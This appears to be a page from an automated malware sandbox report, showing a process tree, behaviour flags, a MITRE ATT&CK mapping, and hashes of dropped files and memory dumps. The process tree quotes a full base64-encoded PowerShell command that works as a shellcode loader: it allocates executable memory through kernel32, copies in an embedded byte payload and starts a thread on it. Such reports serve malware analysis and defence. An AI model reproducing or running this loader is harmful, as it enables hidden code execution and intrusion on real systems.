AGMAYgAsADAAeAA1ADUALAAwAHgAOAA5ACwAMAB4ADMANAAsADAAeAA5ADEALAAwAHgAYQA2ACwAMAB4AGMAOQAsADAAeAAzAGIALAAwAHgAMQBjACwAMAB4ADMANAAsADAAeAA0ADUALAAwAHgAZQBkACwAMAB4ADgAOQAsADAAeABmADIALAAwAHgAYwBhACwAMAB4ADkAYQAsADAAeAA3ADkALAAwAHgAOABiACwAMAB4ADcAZgAsADAAeAA3ADIALAAwAHgAMQA5ACwAMAB4ADAAOAAsADAAeAA4ADAAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAHcANwBPAD0AJAB3ADoAOgBWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoADAALAAwAHgAMQAwADAAMAAsACQAZwAsADAAeAA0ADAAKQA7AGYAbwByACAAKAAkAGkAPQAwADsAJABpACAALQBsAGUAIAAoACQAegAuAEwAZQBuAGcAdABoAC0AMQApADsAJABpACsAKwApACAAewAkAHcAOgA6AG0AZQBtAHMAZQB0ACgAWwBJAG4AdABQAHQAcgBdACgAJAB3ADcATwAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAdwA3AE8ALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAB0AHIAMABwACkAKQA7ACQAegBJADcAIAA9ACAAIgAtAGUAbgBjACAAIgA7AGkAZgAoAFsASQBuAHQAUAB0AHIAXQA6ADoAUwBpAHoAZQAgAC0AZQBxACAAOAApAHsAJABNAFMAWQAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJABNAFMAWQAgACQAegBJADcAIAAkAGUAIgB9AGUAbABzAGUAewA7AGkAZQB4ACAAIgAmACAAcABvAHcAZQByAHMAaABlAGwAbAAgACQAegBJADcAIAAkAGUAIgA7AH0A
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2040
  - - C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" -enc JABVAGQAegBiACAAPQAgACcAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABWAGkAcgB0AHUAYQBsAEEAbABsAG8AYwAoAEkAbgB0AFAAdAByACAAbABwAEEAZABkAHIAZQBzAHMALAAgAHUAaQBuAHQAIABkAHcAUwBpAHoAZQAsACAAdQBpAG4AdAAgAGYAbABBAGwAbABvAGMAYQB0AGkAbwBuAFQAeQBwAGUALAAgAHUAaQBuAHQAIABmAGwAUAByAG8AdABlAGMAdAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAawBlAHIAbgBlAGwAMwAyAC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEEAdAB0AHIAaQBiAHUAdABlAHMALAAgAHUAaQBuAHQAIABkAHcAUwB0AGEAYwBrAFMAaQB6AGUALAAgAEkAbgB0AFAAdAByACAAbABwAFMAdABhAHIAdABBAGQAZAByAGUAcwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABQAGEAcgBhAG0AZQB0AGUAcgAsACAAdQBpAG4AdAAgAGQAdwBDAHIAZQBhAHQAaQBvAG4ARgBsAGEAZwBzACwAIABJAG4AdABQAHQAcgAgAGwAcABUAGgAcgBlAGEAZABJAGQAKQA7AFsARABsAGwASQBtAHAAbwByAHQAKAAiAG0AcwB2AGMAcgB0AC4AZABsAGwAIgApAF0AcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAGUAeAB0AGUAcgBuACAASQBuAHQAUAB0AHIAIABtAGUAbQBzAGUAdAAoAEkAbgB0AFAAdAByACAAZABlAHMAdAAsACAAdQBpAG4AdAAgAHMAcgBjACwAIAB1AGkAbgB0ACAAYwBvAHUAbgB0ACkAOwAnADsAJAB3ACAAPQAgAEEAZABkAC0AVAB5AHAAZQAgAC0AbQBlAG0AYgBlAHIARABlAGYAaQBuAGkAdABpAG8AbgAgACQAVQBkAHoAYgAgAC0ATgBhAG0AZQAgACIAVwBpAG4AMwAyACIAIAAtAG4AYQBtAGUAcwBwAGEAYwBlACAAVwBpAG4AMwAyAEYAdQBuAGMAdABpAG8AbgBzACAALQBwAGEAcwBzAHQAaAByAHUAOwBbAEIAeQB0AGUAWwBdAF0AOwBbAEIAeQB0AGUAWwBdAF0AJAB6ACAAPQAgADAAeABiADgALAAwAHgAOQA2ACwAMAB4ADYAMwAsADAAeAA2ADcALAAwAHgAOQA0ACwAMAB4AGQAYgAsADAAeABkAGMALAAwAHgAZAA5ACwAMAB4ADcANAAsADAAeAAyADQALAAwAHgAZgA0ACwAMAB4ADUAZQAsADAAeAAyAGIALAAwAHgAYwA5ACwAMAB4AGIAMQAsADAAeAA1AGUALAAwAHgAOAAzACwAMAB4AGUAZQAsADAAeABmAGMALAAwAHgAMwAxACwAMAB4ADQANgAsADAAeAAxADEALAAwAHgAMAAzACwAMAB4ADQANgAsADAAeAAxADEALAAwAHgAZQAyACwAMAB4ADYAMwAsADAAeAA5AGYALAAwAHgAOABmACwAMAB4ADEAYgAsADAAeAA4AGIALAAwAHgANgAwACwAMAB4ADUAMAAsADAAeAA0ADQALAAwAHgAYgBhACwAMAB4AGIAMgAsADAAeAAzADQALAAwAHgAMABmACwAMAB4AGUAZQAsADAAeAAwADIALAAwAHgAMwBlACwAMAB4ADUAZAAsADAAeAAwADIALAAwAHgAZQBhACwAMAB4AGEANQAsADAAeABlADkALAAwAHgANAA4ACwAMAB4AGYAOAAsADAAeAAyAGEALAAwAHgANQA5ACwAMAB4ADIANgAsADAAeAAyADYALAAwAHgAMAA0ACwAMAB4ADUAYQAsADAAeAAzAGQALAAwAHgANQA0ACwAMAB4ADQAZQAsADAAeAA5ADUALAAwAHgAOAAxACwAMAB4ADMANQAsADAAeABiADIALAAwAHgAYgA0ACwAMAB4ADcAZAAsADAAeAA0ADQALAAwAHgAZQA3ACwAMAB4ADEANgAsADAAeABiAGMALAAwAHgAOAA3ACwAMAB4AGYAYQAsADAAeAA1ADcALAAwAHgAZgA5ACwAMAB4ADUAMQAsADAAeAA3ADAALAAwAHgAYgA3ACwAMAB4ADUANwAsADAAeABlADkALAAwAHgAMgA4ACwAMAB4ADUANwAsADAAeAAwADAALAAwAHgANgA2ACwAMAB4ADgAZQAsADAAeAA2AGIALAAwAHgAYQBmACwAMAB4AGEAOAAsADAAeAA4ADQALAAwAHgAZAA0ACwAMAB4AGQANwAsADAAeABjAGQALAAwAHgANQBiACwAMAB4AGEAMAAsADAAeAA2AGIALAAwAHgAYwBmACwAMAB4ADgAYgAsADAAeABjADIALAAwAHgAMgBiACwAMAB4AGUAZgAsADAAeAA3AGIALAAwAHgAZAA0ACwAMAB4ADEAOAAsADAAeAA2ADQALAAwAHgAMwAzACwAMAB4AGMAZQAsADAAeAAxAGIALAAwAHgAYgAyACwAMAB4AGIAMAAsADAAeABkADIALAAwAHgAMQAyACwAMAB4AGIAYQAsADAAeAA3ADAALAAwAHgAYQAwACwAMAB4ADYAMAAsADAAeABjAGYALAAwAHgAOAAyACwAMAB4ADYAMAAsADAAeABiADkALAAwAHgAMABmACwAMAB4ADIAOAAsADAAeAA0AGQALAAwAHgANwA2ACwAMAB4ADgAMgAsADAAeAAzADAALAAwAHgAOAA5ACwAMAB4AGIAMAAsADAAeAA3AGQALAAwAHgANAA3ACwAMAB4AGUAMQAsADAAeABjADMALAAwAHgAMAAwACwAMAB4ADUAMAAsADAAeAAzADIALAAwAHgAYgBlACwAMAB4AGQAZQAsADAAeABkADUALAAwAHgAYQA1ACwAMAB4ADEAOAAsADAAeAA5ADQALAAwAHgANABlACwAMAB4ADAAMgAsADAAeAA5ADkALAAwAHgANwA5ACwAMAB4ADAAOAAsADAAeABjADEALAAwAHgAOQA1ACwAMAB4ADMANgAsADAAeAA1AGUALAAwAHgAOABkACwAMAB4AGIAOQAsADAAeABjADkALAAwAHgAYgAzACwAMAB4AGEANQAsADAAeABjADUALAAwAHgANAAyACwAMAB4ADMAMgAsADAAeAA2AGEALAAwAHgANABjACwAMAB4ADEAMAAsADAAeAAxADEALAAwAHgAYQBlACwAMAB4ADEANQAsADAAeABjADIALAAwAHgAMwA4ACwAMAB4AGYANwAsADAAeABmADMALAAwAHgAYQA1ACwAMAB4ADQANQAsADAAeABlADcALAAwAHgANQBiACwAMAB4ADEAOQAsADAAeABlADAALAAwAHgANgAzACwAMAB4ADQAOQAsADAAeAA0AGMALAAwAHgAOQA0ACwAMAB4ADgAYgAsADAAeAA5ADIALAAwAHgANwAxACwAMAB4AGMAOAAsADAAeAAxAGIALAAwAHgAMAAyACwAMAB4AGUAYgAsADAAeAA4ADcALAAwAHgAZABiACwAMAB4AGIAMgAsADAAeAA4ADQALAAwAHgAMABlACwAMAB4AGIAMgAsADAAeAAyAGIALAAwAHgAMwBmACwAMAB4AGIAOQAsADAAeAAwADYALAAwAHgAZABjACwAMAB4ADkAOQAsADAAeAAzAGUALAAwAHgANgA4ACwAMAB4AGYANwAsADAAeABkADcALAAwAHgAOQBiACwAMAB4AGMANQAsADAAeABhADQALAAwAHgANAA0ACwAMAB4ADQAZgAsADAAeABiADkALAAwAHgAMgAyACwAMAB4ADUAMQAsADAAeAAzADkALAAwAHgANAA0ACwAMAB4ADEANQAsADAAeAA1AGEALAAwAHgAMQAwACwAMAB4AGUANQAsADAAeAAwAGEALAAwAHgAYwBmACwAMAB4ADkAOAAsADAAeAA1ADkALAAwAHgAZgBmACwAMAB4ADYANwAsADAAeAA2AGEALAAwAHgANAAyACwAMAB4AGYAZgAsADAAeAA3ADcALAAwAHgANwBjACwAMAB4AGUAMQAsADAAeABmAGYALAAwAHgANwA3ACwAMAB4ADcAYwAsADAAeAAzADUALAAwAHgAOQAzACwAMAB4ADMAYgAsADAAeAAzAGYALAAwAHgAMABlACwAMAB4ADIAMQAsADAAeABhADgALAAwAHgAZQA5ACwAMAB4AGQAZQAsADAAeABjAGQALAAwAHgANgAwACwAMAB4ADcAZAAsADAAeABiADAALAAwAHgANgAyACwAMAB4AGQAMgAsADAAeABlAGEALAAwAHgANwBhACwAMAB4ADIAOAAsADAAeAA5AGIALAAwAHgAOQBmACwAMAB4AGMAMAAsADAAeABhAGEALAAwAHgANAA0ACwAMAB4ADMAYQAsADAAeABiADEALAAwAHgAMQA4ACwAMAB4AGUAMgAsADAAeABlAGQALAAwAHgANgBlACwAMAB4AGYAMQAsADAAeABmADQALAAwAHgANAAxACwAMAB4AGYAOQAsADAAeAA1AGUALAAwAHgANwBjACwAMAB4AGYAZQAsADAAeAAzAGYALAAwAHgAOQBmACwAMAB4AGEAYgAsADAAeAA4ADgALAAwAHgAMAA2ACwAMAB4ADAAYwAsADAAeAAzAGMALAAwAHgAOABiACwAMAB4ADgANAAsADAAeABkAGEALAAwAHgAMwA4ACwAMAB4AGQAOAAsADAAeABkAGIALAAwAHgANAA5ACwAMAB4ADEANgAsADAAeAA4AGMALAAwAHgAOABkACwAMAB4ADAANQAsADAAeAA3ADMALAAwAHgANgA3ACwAMAB4ADEAYwAsADAAeABlAGUALAAwAHgANwBjACwAMAB4ADUAZAAsADAAeABmADYALAAwAHgANwBhACwAMAB4ADgAOQAsADAAeAAwADEALAAwAHgAYQA0ACwAMAB4ADIAOQAsADAAeABkAGUALAAwAHgAZQBlACwAMAB4ADEAYwAsADAAeABhADUALAAwAHgAYwBkACwAMAB4ADEANgAsADAAeABiADkALAAwAHgANABlACwAMAB4AGYAMQAsADAAeABjADIALAAwAHgAMwBjACwAMAB4ADcAMAAsADAAeAA3ADgALAAwAHgAZgBiACwAMAB4ADUANgAsADAAeABmADgALAAwAHgAOQAwACwAMAB4ADAAMwAsADAAeABhADcALAAwAHgAOQAwACwAMAB4AGQAMgAsADAAeABmADMALAAwAHgAOQAyACwAMAB4ADgAMAAsADAAeAAyADQALAAwAHgAMgA2ACwAMAB4ADkAMwAsADAAeAAzADUALAAwAHgAMwBhACwAMAB4AGEAMQAsADAAeABkAGMALAAwAHgAMAAwACwAMAB4ADEAZQAsADAAeAA2ADQALAAwAHgAZQAyACwAMAB4AGIAZgAsADAAeAAzADUALAAwAHgAYwA5ACwAMAB4ADcANAAsADAAeAAzAGYALAAwAHgAZABhACwAMAB4AGMAOQAsADAAeAA4ADQALAAwAHgANQA3ACwAMAB4AGQAYQAsADAAeABjADkALAAwAHgAYwA0ACwAMAB4AGEANwAsADAAeAA4ADkALAAwAHgAYQAxACwAMAB4ADkAYwAsADAAeAAwADMALAAwAHgANwBlACwAMAB4AGQANwAsADAAeABlADIALAAwAHgAOQBlACwAMAB4ADEAMgAsADAAeAA0ADQALAAwAHgANABlACwAMAB4AGEAOQAsADAAeABmADIALAAwAHgAMwBjACwAMAB4ADEAOAAsADAAeABhADkALAAwAHgAZABjACwAMAB4AGMAMgAsADAAeABkADgALAAwAHgAZgBhACwAMAB4ADQAYQAsADAAeABhAGIALAAwAHgAYwBhACwAMAB4ADYAYQAsADAAeABmAGIALAAwAHgAYwA5ACwAMAB4ADEANAAsADAAeAA0ADcALAAwAHgANwA5ACwAMAB4AGMAZAAsADAAeAA5AGYALAAwAHgAYQBhACwAMAB4ADAAOQAsADAAeABjADkALAAwAHgANQBlACwAMAB4AGYANwAsADAAeAA4AGIALAAwAHgAMQA2ACwAMAB4ADEANQAsADAAeAAxADIALAAwAHgAYwBiACwAMAB4ADUANQAsADAAeAA4ADkALAAwAHgAMwA0ACwAMAB4ADkAMQAsADAAeABhADYALAAwAHgAYwA5ACwAMAB4ADMAYgAsADAAeAAxAGMALAAwAHgAMwA0ACwAMAB4ADQANQAsADAAeABlAGQALAAwAHgAOAA5ACwAMAB4AGYAMgAsADAAeABjAGEALAAwAHgAOQBhACwAMAB4ADcAOQAsADAAeAA4AGIALAAwAHgANwBmACwAMAB4ADcAMgAsADAAeAAxADkALAAwAHgAMAA4ACwAMAB4ADgAMAA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAdwA3AE8APQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAHcANwBPAC4AVABvAEkAbgB0ADMAMgAoACkAKwAkAGkAKQAsACAAJAB6AFsAJABpAF0ALAAgADEAKQB9ADsAJAB3ADoAOgBDAHIAZQBhAHQAZQBUAGgAcgBlAGEAZAAoADAALAAwACwAJAB3ADcATwAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwA=
      4⤵
      Blocklisted process makes network request
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:3988
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\54vgogdg\54vgogdg.cmdline"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:2320
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA018.tmp" "c:\Users\Admin\AppData\Local\Temp\54vgogdg\CSC4683A3775B5242DF897F5640A691B7E.TMP"
        6⤵
        
        PID:2500
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 2588
        5⤵
        Program crash
        
        PID:636

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3988 -ip 3988
1⤵
PID:5092

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
2f57fde6b33e89a63cf0dfdd6e60a351

SHA1
445bf1b07223a04f8a159581a3d37d630273010f

SHA256
3b0068d29ae4b20c447227fbf410aa2deedfef6220ccc3f698f3c7707c032c55

SHA512
42857c5f111bfa163e9f4ea6b81a42233d0bbb0836ecc703ce7e8011b6f8a8eca761f39adc3ed026c9a2f99206d88bab9bddb42da9113e478a31a6382af5c220

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
d8b9a260789a22d72263ef3bb119108c

SHA1
376a9bd48726f422679f2cd65003442c0b6f6dd5

SHA256
d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

SHA512
550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

Download Submit
C:\Users\Admin\AppData\Local\Temp\54vgogdg\54vgogdg.dll

Filesize
3KB

MD5
3bf982072197b87bdf1516f695829b64

SHA1
5d4412b1847c05572fc0a9487c6e072e09d8439d

SHA256
779f4025a8730793098ebe1d8b713ea866bd4b17a2d39fac2cf80d1efb144607

SHA512
9e2cc934b225a1aca8f52c5caa6ca3192e64d988fdb724517ff7542b5ed60667cd857295248ce4d7ab922a303117b0c335a209ce1e106a88f058f7f707b473ec

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESA018.tmp

Filesize
1KB

MD5
22c334ff81c75ffd4208d5af18a17f38

SHA1
101d7039d7d5b4c68897065c15f1e0f6a5311ef2

SHA256
7db131035c8f4f8a719daab26fcff7483e6910e86c09e67d82be18ab5dfd56cb

SHA512
0c22e38a5fe27f53b0d893b69f74342cc565c09f1df9ed786c58c91f9cf81dc238a170d2e76edacc4a9eab5bb780b90e2738ee5f8dd379b3cf5320243f2fae7d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_vtknesbt.ex3.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\54vgogdg\54vgogdg.0.cs

Filesize
557B

MD5
7319070c34daa5f6f2ece2dfc07119ee

SHA1
f26a4a48518a5608e93c8b77368f588b0433973c

SHA256
b240a9bb4f72d886522e19fa40b9c688fa94c1bd6dc7b7185f94e4466273a5dc

SHA512
34169fc9fb0cd2381c45efcd22ec1bc659ef513e73bc4c7bcb91ca1d5129a1a149e9f75297acb4958e52ff04d75e6e121232dbc0657611e41b63f10aa3e1d6bd

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\54vgogdg\54vgogdg.cmdline

Filesize
369B

MD5
9fe4f561d8480ade43c5eb61a777e5dd

SHA1
a826a35ffbf7c62ef71d1fd2d2ecb96faeca01f2

SHA256
2b7b0dcf6f72293a1187f0e4b31eec177292d561be9a502f9905cc1d0b374601

SHA512
9d8fe10aacf1283a8b6c083ad0ad6e2aca15f92f7e8a05791111b1217dae12b7ee00bad555fa884718dd22fe912d1723d31bf4e00476d96c11292d444e6a0e67

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\54vgogdg\CSC4683A3775B5242DF897F5640A691B7E.TMP

Filesize
652B

MD5
6025570d842a8c410234e22aea628ee0

SHA1
360509235419aa5165832ca62a9b7fc443f84349

SHA256
7153ccd7cb03befcdd49cadf80c68ac18510655384cdfa8e250d876998f2a6f7

SHA512
9bee373bdb2649257694431fc9e4802e869fb8550b2e130995a7a7fa699ee24f713f3f25a3fd0100f6e28bc0fe3d0d7e3f2285ef6d7bdd7da9abf963a6db2c91

Download Submit
memory/248-145-0x0000014E11CF0000-0x0000014E11D00000-memory.dmp

Filesize
64KB

Download
memory/248-207-0x00007FFA364C0000-0x00007FFA36F81000-memory.dmp

Filesize
10.8MB

Download
memory/248-161-0x00007FFA364C0000-0x00007FFA36F81000-memory.dmp

Filesize
10.8MB

Download
memory/248-146-0x0000014E11CF0000-0x0000014E11D00000-memory.dmp

Filesize
64KB

Download
memory/248-147-0x0000014E11CF0000-0x0000014E11D00000-memory.dmp

Filesize
64KB

Download
memory/248-144-0x00007FFA364C0000-0x00007FFA36F81000-memory.dmp

Filesize
10.8MB

Download
memory/248-134-0x0000014E2C2F0000-0x0000014E2C312000-memory.dmp

Filesize
136KB

Download
memory/2040-148-0x00007FFA364C0000-0x00007FFA36F81000-memory.dmp

Filesize
10.8MB

Download
memory/2040-203-0x00007FFA364C0000-0x00007FFA36F81000-memory.dmp

Filesize
10.8MB

Download
memory/2040-177-0x00007FFA364C0000-0x00007FFA36F81000-memory.dmp

Filesize
10.8MB

Download
memory/3240-133-0x0000000000400000-0x0000000000423000-memory.dmp

Filesize
140KB

Download
memory/3988-159-0x0000000074CE0000-0x0000000075490000-memory.dmp

Filesize
7.7MB

Download
memory/3988-179-0x00000000077D0000-0x0000000007E4A000-memory.dmp

Filesize
6.5MB

Download
memory/3988-180-0x0000000007120000-0x000000000713A000-memory.dmp

Filesize
104KB

Download
memory/3988-178-0x0000000004C90000-0x0000000004CA0000-memory.dmp

Filesize
64KB

Download
memory/3988-176-0x00000000060B0000-0x00000000060CE000-memory.dmp

Filesize
120KB

Download
memory/3988-171-0x00000000059B0000-0x0000000005A16000-memory.dmp

Filesize
408KB

Download
memory/3988-165-0x0000000005260000-0x00000000052C6000-memory.dmp

Filesize
408KB

Download
memory/3988-164-0x0000000005140000-0x0000000005162000-memory.dmp

Filesize
136KB

Download
memory/3988-194-0x0000000006520000-0x0000000006521000-memory.dmp

Filesize
4KB

Download
memory/3988-195-0x0000000074CE0000-0x0000000075490000-memory.dmp

Filesize
7.7MB

Download
memory/3988-196-0x0000000006520000-0x0000000006521000-memory.dmp

Filesize
4KB

Download
memory/3988-197-0x0000000004C90000-0x0000000004CA0000-memory.dmp

Filesize
64KB

Download
memory/3988-198-0x0000000007E50000-0x0000000008250000-memory.dmp

Filesize
4.0MB

Download
memory/3988-200-0x0000000074CE0000-0x0000000075490000-memory.dmp

Filesize
7.7MB

Download
memory/3988-163-0x00000000052D0000-0x00000000058F8000-memory.dmp

Filesize
6.2MB

Download
memory/3988-162-0x0000000004C90000-0x0000000004CA0000-memory.dmp

Filesize
64KB

Download
memory/3988-160-0x0000000004C90000-0x0000000004CA0000-memory.dmp

Filesize
64KB

Download
memory/3988-158-0x0000000002A30000-0x0000000002A66000-memory.dmp

Filesize
216KB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads